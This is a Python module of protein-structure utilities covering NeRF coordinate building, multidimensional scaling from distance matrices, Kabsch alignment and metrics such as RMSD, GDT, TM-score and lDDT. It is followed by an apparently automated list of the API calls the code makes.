bonds = bonds[:, :-1]
# modify adj mat
adj_mat[s, bonds[0], bonds[1]] = 1
# convert to undirected
adj_mat[s] = adj_mat[s] + adj_mat[s].t()
# do N_th degree adjacency
adj_mat, attr_mat = nth_deg_adjacency(adj_mat, n=adj_degree, sparse=False) # True
if mat:
return attr_mat.bool().to(seqs.device), attr_mat.to(device)
else:
edge_idxs = attr_mat[0].nonzero().t().long()
edge_attrs = attr_mat[0, edge_idxs[0], edge_idxs[1]]
return edge_idxs.to(seqs.device), edge_attrs.to(seqs.device)
def nerf_torch(a, b, c, l, theta, chi):
""" Custom Natural extension of Reference Frame.
Inputs:
* a: (batch, 3) or (3,). point(s) of the plane, not connected to d
* b: (batch, 3) or (3,). point(s) of the plane, not connected to d
* c: (batch, 3) or (3,). point(s) of the plane, connected to d
* theta: (batch,) or (float). angle(s) between b-c-d
* chi: (batch,) or float. dihedral angle(s) between the a-b-c and b-c-d planes
Outputs: d (batch, 3) or (3,). the next point in the sequence, linked to c
"""
# safety check
if not ( (-np.pi <= theta) * (theta <= np.pi) ).all().item():
raise ValueError(f"theta(s) must be in radians and in [-pi, pi]. theta(s) = {theta}")
# calc vecs
ba = b-a
cb = c-b
# calc rotation matrix. based on plane normals and normalized
n_plane = torch.cross(ba, cb, dim=-1)
n_plane_ = torch.cross(n_plane, cb, dim=-1)
rotate = torch.stack([cb, n_plane_, n_plane], dim=-1)
rotate /= torch.norm(rotate, dim=-2, keepdim=True)
# calc proto point, rotate
d = torch.stack([-torch.cos(theta),
torch.sin(theta) * torch.cos(chi),
torch.sin(theta) * torch.sin(chi)], dim=-1).unsqueeze(-1)
# extend base point, set length
return c + l.unsqueeze(-1) * torch.matmul(rotate, d).squeeze()
def sidechain_container(backbones, n_aa, cloud_mask=None, place_oxygen=False,
n_atoms=NUM_COORDS_PER_RES, padding=GLOBAL_PAD_CHAR):
""" Gets a backbone of the protein, returns the whole coordinates
with sidechains (same format as sidechainnet). Keeps differentiability.
Inputs:
* backbones: (batch, L*3, 3): assume batch=1 (could be extended later).
Coords for (N-term, C-alpha, C-term) of every aa.
* n_aa: int. number of points for each aa in the backbones.
* cloud_mask: (batch, l, c). optional. cloud mask from scn_cloud_mask`.
returns point outside to 0. if passed, else c_alpha
* place_oxygen: whether to claculate the oxygen of the
carbonyl group via NeRF
* n_atoms: int. n of atom positions / atom. same as in sidechainnet: 14
* padding: int. padding token. same as in sidechainnet: 0
Outputs: whole coordinates of shape (batch, L, n_atoms, 3)
"""
device = backbones.device
batch, length = backbones.shape[0], backbones.shape[1] // n_aa
# build scaffold from (N, CA, C, CB)
new_coords = torch.zeros(batch, length, NUM_COORDS_PER_RES, 3).to(device)
predicted = rearrange(backbones, 'b (l back) d -> b l back d', l=length)
# set backbone positions
new_coords[:, :, :3] = predicted[:, :, :3]
# set rest of positions to c_beta if present, else c_alpha
if n_aa == 4:
new_coords[:, :, 4:] = repeat(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)
else:
new_coords[:, :, 4:] = repeat(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)
if cloud_mask is not None:
new_coords[torch.logical_not(cloud_mask)] = 0.
# hard-calculate oxygen position of carbonyl group with parallel version of NERF
if place_oxygen:
# build (=O) position of revery aa in each chain
for s in range(batch):
# dihedrals phi=f(c-1, n, ca, c) & psi=f(n, ca, c, n+1)
# phi = get_dihedral_torch(*backbone[s, i*3 - 1 : i*3 + 3]) if i>0 else None
psis = torch.tensor([ get_dihedral_torch(*backbones[s, i*3 + 0 : i*3 + 4] )if i < length-1 else np.pi*5/4 \
for i in range(length) ])
# the angle for placing oxygen is opposite to psi of current res.
# psi not available for last one so pi/4 taken for now
bond_lens = repeat(torch.tensor(BB_BUILD_INFO["BONDLENS"]["c-o"]), ' -> b', b=length).to(psis.device)
bond_angs = repeat(torch.tensor(BB_BUILD_INFO["BONDANGS"]["ca-c-o"]), ' -> b', b=length).to(psis.device)
correction = repeat(torch.tensor(-np.pi), ' -> b', b=length).to(psis.device)
new_coords[:, :, 3] = nerf_torch(new_coords[:, :, 0],
new_coords[:, :, 1],
new_coords[:, :, 2],
bond_lens, bond_angs, psis + correction)
else:
# init oxygen to carbonyl
new_coords[:, :, 3] = predicted[:, :, 2]
return new_coords
# distance utils (distogram to dist mat + masking)
def center_distogram_torch(distogram, bins=DISTANCE_THRESHOLDS, min_t=1., center="mean", wide="std"):
""" Returns the central estimate of a distogram. Median for now.
Inputs:
* distogram: (batch, N, N, B) where B is the number of buckets.
* bins: (B,) containing the cutoffs for the different buckets
* min_t: float. lower bound for distances.
Outputs:
* central: (batch, N, N)
* dispersion: (batch, N, N)
* weights: (batch, N, N)
"""
shape, device = distogram.shape, distogram.device
# threshold to weights and find mean value of each bin
n_bins = ( bins - 0.5 * (bins[2] - bins[1]) ).to(device)
n_bins[0] = 1.5
n_bins[-1] = 1.33*bins[-1] # above last threshold is ignored
max_bin_allowed = torch.tensor(n_bins.shape[0]-1).to(device).long()
# calculate measures of centrality and dispersion -
magnitudes = distogram.sum(dim=-1)
if center == "median":
cum_dist = torch.cumsum(distogram, dim=-1)
medium = 0.5 * cum_dist[..., -1:]
central = torch.searchsorted(cum_dist, medium).squeeze()
central = n_bins[ torch.min(central, max_bin_allowed) ]
elif center == "mean":
central = (distogram * n_bins).sum(dim=-1) / magnitudes
# create mask for last class - (IGNORE_INDEX)
mask = (central <= bins[-2].item()).float()
# mask diagonal to 0 dist - don't do masked filling to avoid inplace errors
diag_idxs = np.arange(shape[-2])
central = expand_dims_to(central, 3 - len(central.shape))
central[:, diag_idxs, diag_idxs] *= 0.
# provide weights
if wide == "var":
dispersion = (distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes
elif wide == "std":
dispersion = ((distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes).sqrt()
else:
dispersion = torch.zeros_like(central, device=device)
# rescale to 0-1. lower std / var --> weight=1. set potential nan's to 0
weights = mask / (1+dispersion)
weights[weights != weights] *= 0.
weights[:, diag_idxs, diag_idxs] *= 0.
return central, weights
# distance matrix to 3d coords: https://github.com/scikit-learn/scikit-learn/blob/42aff4e2e/sklearn/manifold/_mds.py#L279
def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
Assumes (for now) distogram is (N x N) and symmetric
Outs:
* best_3d_coords: (batch x 3 x N)
* historic_stresses: (batch x steps)
"""
device, dtype = pre_dist_mat.device, pre_dist_mat.type()
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
diag_idxs = np.arange(N)
his = [torch.tensor([np.inf]*batch, device=device)]
# initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf
# follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf
D = pre_dist_mat**2
M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D)
# do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)
# https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336
svds = [torch.svd_lowrank(mi) for mi in M]
u = torch.stack([svd[0] for svd in svds], dim=0)
s = torch.stack([svd[1] for svd in svds], dim=0)
v = torch.stack([svd[2] for svd in svds], dim=0)
best_3d_coords = torch.bmm(u, torch.diag_embed(s).sqrt())[..., :3]
# only eigen - way faster but not weights
if weights is None and eigen==True:
return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))
elif eigen==True:
if verbose:
print("Can't use eigen flag if weights are active. Fallback to iterative")
# continue the iterative way
if weights is None:
weights = torch.ones_like(pre_dist_mat)
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
best_3d_coords = best_3d_coords.contiguous()
dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()
stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[ dist_mat <= 0 ] += 1e-7
ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)
# update
coords = (1. / N * torch.matmul(B, best_3d_coords))
dis = torch.norm(coords, dim=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
# update metrics if relative improvement above tolerance
if (his[-1] - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
his.append( stress / dis )
return torch.transpose(best_3d_coords, -1,-2), torch.stack(his, dim=0)
def mds_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
Assumes (for now) distrogram is (N x N) and symmetric
Out:
* best_3d_coords: (3 x N)
* historic_stress
"""
if weights is None:
weights = np.ones_like(pre_dist_mat)
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
his = [np.inf]
# init random coords
best_stress = np.inf * np.ones(batch)
best_3d_coords = 2*np.random.rand(batch, 3, N) - 1
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
dist_mat = np.linalg.norm(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :], axis=-3)
stress = (( weights * (dist_mat - pre_dist_mat) )**2).sum(axis=(-1, -2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[dist_mat == 0] = 1e-7
ratio = weights * (pre_dist_mat / dist_mat)
B = -ratio
B[:, np.arange(N), np.arange(N)] += ratio.sum(axis=-1)
# update - double transpose. TODO: consider fix
coords = (1. / N * np.matmul(best_3d_coords, B))
dis = np.linalg.norm(coords, axis=(-1, -2))
if verbose >= 2:
print('it: %d, stress %s' % (i, stress))
# update metrics if relative improvement above tolerance
if (best_stress - stress / dis).mean() <= tol:
if verbose:
print('breaking at iteration %d with stress %s' % (i,
stress / dis))
break
best_3d_coords = coords
best_stress = stress / dis
his.append(best_stress)
return best_3d_coords, np.array(his)
def get_dihedral_torch(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Can't use torch.dot bc it does not broadcast
Inputs:
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return torch.atan2( ( (torch.norm(u2, dim=-1, keepdim=True) * u1) * torch.cross(u2,u3, dim=-1) ).sum(dim=-1) ,
( torch.cross(u1,u2, dim=-1) * torch.cross(u2, u3, dim=-1) ).sum(dim=-1) )
def get_dihedral_numpy(c1, c2, c3, c4):
""" Returns the dihedral angle in radians.
Will use atan2 formula from:
https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
Inputs:
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
* c1: (batch, 3) or (3,)
"""
u1 = c2 - c1
u2 = c3 - c2
u3 = c4 - c3
return np.arctan2( ( (np.linalg.norm(u2, axis=-1, keepdims=True) * u1) * np.cross(u2,u3, axis=-1)).sum(axis=-1),
( np.cross(u1,u2, axis=-1) * np.cross(u2, u3, axis=-1) ).sum(axis=-1) )
def calc_phis_torch(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (batch, N) boolean mask for N-term positions
* CA_mask: (batch, N) boolean mask for C-alpha positions
* C_mask: (batch, N) or None. boolean mask for C-alpha positions or
automatically calculate from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
Note: use [0] since all prots in batch have same backbone
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = torch.transpose(pred_coords.detach(), -1 , -2).cpu()
# ensure dims
N_mask = expand_dims_to( N_mask, 2-len(N_mask.shape) )
CA_mask = expand_dims_to( CA_mask, 2-len(CA_mask.shape) )
if C_mask is not None:
C_mask = expand_dims_to( C_mask, 2-len(C_mask.shape) )
else:
C_mask = torch.logical_not(torch.logical_or(N_mask,CA_mask))
# select points
n_terms = pred_coords_[:, N_mask[0].squeeze()]
c_alphas = pred_coords_[:, CA_mask[0].squeeze()]
c_terms = pred_coords_[:, C_mask[0].squeeze()]
# compute phis for every pritein in the batch
phis = [get_dihedral_torch(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return torch.tensor( [(x<0).float().mean().item() for x in phis] )
return phis
def calc_phis_numpy(pred_coords, N_mask, CA_mask, C_mask=None,
prop=True, verbose=0):
""" Filters mirrors selecting the 1 with most N of negative phis.
Used as part of the MDScaling wrapper if arg is passed. See below.
Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
Inputs:
* pred_coords: (batch, 3, N) predicted coordinates
* N_mask: (N, ) boolean mask for N-term positions
* CA_mask: (N, ) boolean mask for C-alpha positions
* C_mask: (N, ) or None. boolean mask for C-alpha positions or
automatically calculate from N_mask and CA_mask if None.
* prop: bool. whether to return as a proportion of negative phis.
* verbose: bool. verbosity level
Output: (batch, N) containing the phi angles or (batch,) containing
the proportions.
"""
# detach gradients for angle calculation - mirror selection
pred_coords_ = np.transpose(pred_coords, (0, 2, 1))
n_terms = pred_coords_[:, N_mask.squeeze()]
c_alphas = pred_coords_[:, CA_mask.squeeze()]
# select c_term auto if not passed
if C_mask is not None:
c_terms = pred_coords_[:, C_mask]
else:
c_terms = pred_coords_[:, (np.ones_like(N_mask)-N_mask-CA_mask).squeeze().astype(bool) ]
# compute phis for every pritein in the batch
phis = [get_dihedral_numpy(c_terms[i, :-1],
n_terms[i, 1:],
c_alphas[i, 1:],
c_terms[i, 1:]) for i in range(pred_coords.shape[0])]
# return percentage of lower than 0
if prop:
return np.array( [(x<0).mean() for x in phis] )
return phis
# alignment by centering + rotation to compute optimal RMSD
# adapted from : https://github.com/charnley/rmsd/
def kabsch_torch(X, Y, cpu=True):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
device = X.device
# center X and Y to the origin
X_ = X - X.mean(dim=-1, keepdim=True)
Y_ = Y - Y.mean(dim=-1, keepdim=True)
# calculate convariance matrix (for each prot in the batch)
C = torch.matmul(X_, Y_.t()).detach()
if cpu:
C = C.cpu()
# Optimal rotation matrix via SVD
if int(torch.__version__.split(".")[1]) < 8:
# warning! int torch 1.<8 : W must be transposed
V, S, W = torch.svd(C)
W = W.t()
else:
V, S, W = torch.linalg.svd(C)
# determinant sign for direction correction
d = (torch.det(V) * torch.det(W)) < 0.0
if d:
S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = torch.matmul(V, W).to(device)
# calculate rotations
X_ = torch.matmul(X_.t(), U).t()
# return centered and aligned
return X_, Y_
def kabsch_numpy(X, Y):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
# center X and Y to the origin
X_ = X - X.mean(axis=-1, keepdims=True)
Y_ = Y - Y.mean(axis=-1, keepdims=True)
# calculate convariance matrix (for each prot in the batch)
C = np.dot(X_, Y_.transpose())
# Optimal rotation matrix via SVD
V, S, W = np.linalg.svd(C)
# determinant sign for direction correction
d = (np.linalg.det(V) * np.linalg.det(W)) < 0.0
if d:
S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = np.dot(V, W)
# calculate rotations
X_ = np.dot(X_.T, U).T
# return centered and aligned
return X_, Y_
# metrics - more formulas here: http://predictioncenter.org/casp12/doc/help.html
def distmat_loss_torch(X=None, Y=None, X_mat=None, Y_mat=None, p=2, q=2, custom=None, distmat_mask=None):
""" Calculates a loss on the distance matrix - no need to align structs.
Inputs:
* X: (N, d) tensor. the predicted structure. One of (X, X_mat) is needed.
* X_mat: (N, N) tensor. the predicted distance matrix. Optional ()
* Y: (N, d) tensor. the true structure. One of (Y, Y_mat) is needed.
* Y_mat: (N, N) tensor. the predicted distance matrix. Optional ()
* p: int. power for the distance calculation (2 for euclidean)
* q: float. power for the scaling of the loss (2 for MSE, 1 for MAE, etc)
* custom: func or None. custom loss over distance matrices.
ex: lambda x,y: 1 - 1/ (1 + ((x-y))**2) (1 is very bad. 0 is good)
* distmat_mask: (N, N) mask (boolean or weights for each ij pos). optional.
"""
assert (X is not None or X_mat is not None) and \
(Y is not None or Y_mat is not None), "The true and predicted coords or dist mats must be provided"
# calculate distance matrices
if X_mat is None:
X_mat = torch.cdist(X, X, p=p)
if Y_mat is None:
Y_mat = torch.cdist(Y, Y, p=p)
if distmat_mask is None:
distmat_mask = torch.ones_like(Y_mat).bool()
# do custom expression if passed
if custom is not None:
loss = custom(X_mat, Y_mat).mean()
# **2 ensures always positive. Later scale back to desired power
else:
loss = ( X_mat - Y_mat )**2
if q != 2:
loss = loss**(q/2)
return loss[distmat_mask].mean()
def rmsd_torch(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return torch.sqrt( torch.mean((X - Y)**2, axis=(-1, -2)) )
def rmsd_numpy(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return np.sqrt( np.mean((X - Y)**2, axis=(-1, -2)) )
def gdt_torch(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
device = X.device
if weights is None:
weights = torch.ones(1,len(cutoffs))
else:
weights = torch.tensor([weights]).to(device)
# set zeros and fill with values
GDT = torch.zeros(X.shape[0], len(cutoffs), device=device)
dist = ((X - Y)**2).sum(dim=1).sqrt()
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).float().mean(dim=-1)
# weighted mean
return (GDT*weights).mean(-1)
def gdt_numpy(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
if weights is None:
weights = np.ones( (1,len(cutoffs)) )
else:
weights = np.array([weights])
# set zeros and fill with values
GDT = np.zeros( (X.shape[0], len(cutoffs)) )
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).mean(axis=-1)
# weighted mean
return (GDT*weights).mean(-1)
def tmscore_torch(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = ((X - Y)**2).sum(dim=1).sqrt()
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(dim=-1)
def tmscore_numpy(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(axis=-1)
def mdscaling_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None,
eigen=False, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_torch(pre_dist_mat, weights=weights,iters=iters,
tol=tol, eigen=eigen, verbose=verbose)
if not fix_mirror:
return preds, stresses
# no need to caculate multiple mirrors - just correct Z axis
phi_ratios = calc_phis_torch(preds, N_mask, CA_mask, C_mask, prop=True)
to_correct = torch.nonzero( (phi_ratios < 0.5)).view(-1)
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
preds[to_correct, -1] = (-1)*preds[to_correct, -1]
if verbose == 2:
print("Corrected mirror idxs:", to_correct)
return preds, stresses
def mdscaling_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_numpy(pre_dist_mat, weights=weights,iters=iters,
tol=tol, verbose=verbose)
if not fix_mirror:
return preds, stresses
# no need to caculate multiple mirrors - just correct Z axis
phi_ratios = calc_phis_numpy(preds, N_mask, CA_mask, C_mask, prop=True)
for i,pred in enumerate(preds):
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
if phi_ratios < 0.5:
preds[i, -1] = (-1)*preds[i, -1]
if verbose == 2:
print("Corrected mirror in struct no.", i)
return preds, stresses
def lddt_ca_torch(true_coords, pred_coords, cloud_mask, r_0=15.):
""" Computes the lddt score for each C_alpha.
https://academic.oup.com/bioinformatics/article/29/21/2722/195896
Inputs:
* true_coords: (b, l, c, d) in sidechainnet format.
* pred_coords: (b, l, c, d) in sidechainnet format.
* cloud_mask : (b, l, c) adapted for scn format.
* r_0: float. maximum inclusion radius in reference struct.
Outputs:
* (b, l) lddt for c_alpha scores (ranging between 0 and 1)
See wrapper below.
"""
device, dtype = true_coords.device, true_coords.type()
thresholds = torch.tensor([0.5, 1, 2, 4], device=device).type(dtype)
# adapt masks
cloud_mask = cloud_mask.bool().cpu()
c_alpha_mask = torch.zeros(cloud_mask.shape[1:], device=device).bool() # doesn't have batch dim
c_alpha_mask[..., 1] = True
# container for c_alpha scores (between 0,1)
wrapper = torch.zeros(true_coords.shape[:2], device=device).type(dtype)
for bi, seq in enumerate(true_coords):
# select atoms for study
c_alphas = cloud_mask[bi]*c_alpha_mask # only pick c_alpha positions
selected_pred = pred_coords[bi, c_alphas, :]
selected_target = true_coords[bi, c_alphas, :]
# get number under distance
dist_mat_pred = torch.cdist(selected_pred, selected_pred, p=2)
dist_mat_target = torch.cdist(selected_target, selected_target, p=2)
under_r0_target = dist_mat_target < r_0
compare_dists = torch.abs(dist_mat_pred - dist_mat_target)[under_r0_target]
# measure diff below threshold
score = torch.zeros_like(under_r0_target).float()
max_score = torch.zeros_like(under_r0_target).float()
max_score[under_r0_target] = 4.
# measure under how many thresholds
score[under_r0_target] = thresholds.shape[0] - \
torch.bucketize( compare_dists, boundaries=thresholds ).float()
# dont include diagonal
l_mask = c_alphas.float().sum(dim=-1).bool()
wrapper[bi, l_mask] = ( score.sum(dim=-1) - thresholds.shape[0] ) / \
( max_score.sum(dim=-1) - thresholds.shape[0] )
return wrapper
################
### WRAPPERS ###
################
@set_backend_kwarg
@invoke_torch_or_numpy(mdscaling_torch, mdscaling_numpy)
def MDScaling(pre_dist_mat, **kwargs):
""" Gets distance matrix (-ces). Outputs 3d.
Assumes (for now) distrogram is (N x N) and symmetric.
For support of ditograms: see `center_distogram_torch()`
Inputs:
* pre_dist_mat: (1, N, N) distance matrix.
* weights: optional. (N x N) pairwise relative weights .
* iters: number of iterations to run the algorithm on
* tol: relative tolerance at which to stop the algorithm if no better
improvement is achieved
* backend: one of ["numpy", "torch", "auto"] for backend choice
* fix_mirror: int. number of iterations to run the 3d generation and
pick the best mirror (highest number of negative phis)
* N_mask: indexing array/tensor for indices of backbone N.
Only used if fix_mirror > 0.
* CA_mask: indexing array/tensor for indices of backbone C_alpha.
Only used if fix_mirror > 0.
* verbose: whether to print logs
Outputs:
* best_3d_coords: (3 x N)
* historic_stress: (timesteps, )
"""
pre_dist_mat = expand_dims_to(pre_dist_mat, 3 - len(pre_dist_mat.shape))
return pre_dist_mat, kwargs
@expand_arg_dims(dim_len = 2)
@set_backend_kwarg
@invoke_torch_or_numpy(kabsch_torch, kabsch_numpy)
def Kabsch(A, B):
""" Returns Kabsch-rotated matrices resulting
from aligning A into B.
Adapted from: https://github.com/charnley/rmsd/
* Inputs:
* A,B are (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of shape (3 x N)
"""
# run calcs - pick the 0th bc an additional dim was created
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(rmsd_torch, rmsd_numpy)
def RMSD(A, B):
""" Returns RMSD score as defined here (lower is better):
https://en.wikipedia.org/wiki/
Root-mean-square_deviation_of_atomic_positions
* Inputs:
* A,B are (B x 3 x N) or (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of size (B,)
"""
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(gdt_torch, gdt_numpy)
def GDT(A, B, *, mode="TS", cutoffs=[1,2,4,8], weights=None):
""" Returns GDT score as defined here (highre is better):
Supports both TS and HA
http://predictioncenter.org/casp12/doc/help.html
* Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* cutoffs: defines thresholds for gdt
* weights: list containing the weights
* mode: one of ["numpy", "torch", "auto"] for backend
* Outputs: tensor/array of size (B,)
"""
# define cutoffs for each type of gdt and weights
cutoffs = [0.5,1,2,4] if mode in ["HA", "ha"] else [1,2,4,8]
# calculate GDT
return A, B, cutoffs, {'weights': weights}
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(tmscore_torch, tmscore_numpy)
def TMscore(A, B):
""" Returns TMscore as defined here (higher is better):
>0.5 (likely) >0.6 (highly likely) same folding.
= 0.2. https://en.wikipedia.org/wiki/Template_modeling_score
Warning! It's not exactly the code in:
https://zhanglab.ccmb.med.umich.edu/TM-score/TMscore.cpp
but will suffice for now.
Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* mode: one of ["numpy", "torch", "auto"] for backend
Outputs: tensor/array of size (B,)
"""
return A, B
| [
"numpy.random.rand",
"torch.sin",
"torch.det",
"torch.searchsorted",
"torch.cdist",
"torch.min",
"numpy.array",
"torch.cos",
"numpy.linalg.norm",
"numpy.arange",
"torch.logical_or",
"numpy.mean",
"numpy.cross",
"torch.mean",
"einops.repeat",
"torch.logical_not",
"functools.wraps",
... | [((641, 660), 'sidechainnet.utils.sequence.ProteinVocabulary', 'ProteinVocabulary', ([], {}), '()\n', (658, 660), False, 'from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP\n'), ((842, 898), 'torch.linspace', 'torch.linspace', (['(2)', '(20)'], {'steps': 'constants.DISTOGRAM_BUCKETS'}), '(2, 20, steps=constants.DISTOGRAM_BUCKETS)\n', (856, 898), False, 'import torch\n'), ((1059, 1091), 'torch.cdist', 'torch.cdist', (['coords', 'coords'], {'p': '(2)'}), '(coords, coords, p=2)\n', (1070, 1091), False, 'import torch\n'), ((1109, 1171), 'torch.linspace', 'torch.linspace', (['(2)', '(20)'], {'steps': 'num_buckets', 'device': 'coords.device'}), '(2, 20, steps=num_buckets, device=coords.device)\n', (1123, 1171), False, 'import torch\n'), ((1204, 1247), 'torch.bucketize', 'torch.bucketize', (['distances', 'boundaries[:-1]'], {}), '(distances, boundaries[:-1])\n', (1219, 1247), False, 'import torch\n'), ((1422, 1431), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (1427, 1431), False, 'from functools import wraps\n'), ((3088, 3109), 'sidechainnet.structure.build_info.SC_BUILD_INFO.items', 'SC_BUILD_INFO.items', ([], {}), '()\n', (3107, 3109), False, 'from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO\n'), ((3335, 3347), 'numpy.zeros', 'np.zeros', (['(14)'], {}), '(14)\n', (3343, 3347), True, 'import numpy as np\n'), ((3677, 3689), 'numpy.zeros', 'np.zeros', (['(14)'], {}), '(14)\n', (3685, 3689), True, 'import numpy as np\n'), ((4654, 4725), 'os.system', 'os.system', (['f"""curl https://files.rcsb.org/download/{name}.pdb > {route}"""'], {}), "(f'curl https://files.rcsb.org/download/{name}.pdb > {route}')\n", (4663, 4725), False, 'import os\n'), ((5225, 5246), 'mdtraj.load_pdb', 'mdtraj.load_pdb', (['name'], {}), '(name)\n', (5240, 5246), False, 'import mdtraj\n'), ((6776, 6802), 'numpy.newaxis', 'np.newaxis', (['coords'], {'axis': '(0)'}), '(coords, axis=0)\n', (6786, 6802), True, 'import numpy as np\n'), ((7198, 7225), 'mdtraj.load_pdb', 'mdtraj.load_pdb', (['pdb_destin'], {}), '(pdb_destin)\n', (7213, 7225), False, 'import mdtraj\n'), ((7772, 7804), 'torch.zeros', 'torch.zeros', (['cloud_mask.shape', '(3)'], {}), '(cloud_mask.shape, 3)\n', (7783, 7804), False, 'import torch\n'), ((14153, 14181), 'torch.cat', 'torch.cat', (['batch_mask'], {'dim': '(0)'}), '(batch_mask, dim=0)\n', (14162, 14181), False, 'import torch\n'), ((14937, 14979), 'einops.rearrange', 'rearrange', (['wrapper', '"""... l c -> ... (l c)"""'], {}), "(wrapper, '... l c -> ... (l c)')\n", (14946, 14979), False, 'from einops import rearrange, repeat\n'), ((15752, 15782), 'torch.cat', 'torch.cat', (['batch_tokens'], {'dim': '(0)'}), '(batch_tokens, dim=0)\n', (15761, 15782), False, 'import torch\n'), ((16420, 16445), 'torch.zeros_like', 'torch.zeros_like', (['adj_mat'], {}), '(adj_mat)\n', (16436, 16445), False, 'import 